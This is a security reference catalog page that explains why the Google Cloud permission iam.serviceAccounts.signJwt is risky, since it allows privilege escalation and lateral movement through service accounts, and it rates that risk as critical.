catalog logoThe IAM Privilege Catalog

services / Google Cloud / Service Accounts

Service accounts are Google accounts intended for use by applications or workloads for authentication. They can be either managed by Google or user-managed.

Many of these permissions are extremely sensitive, because service accounts are frequently overprovisioned. A user with access to a service account effectively has access to all permissions the service account has, so broad access to service accounts can allow users to gain unintended access.

iam.​serviceAccounts.​signJwt

Can be used for escalation by signing an access token request.

Risks

  1. Lateral movement (BOOST)

Scope: CRITICAL

This privilege may grant access to sensitive data from a significant fraction of organizational functions, allow interruption of critical organizational services, or its exploit could lead to significant privilege escalation.

Links

  • https:​/​/​cloud.​google.​com/​iam/​docs/​service-​account-​overview
  • https:​/​/​rhinosecuritylabs.​com/​gcp/​privilege-​escalation-​google-​cloud-​platform-​part-​1

    • Contributed by P0 Security

    © 2023–present P0 Security and contributors to the IAM Privilege Catalog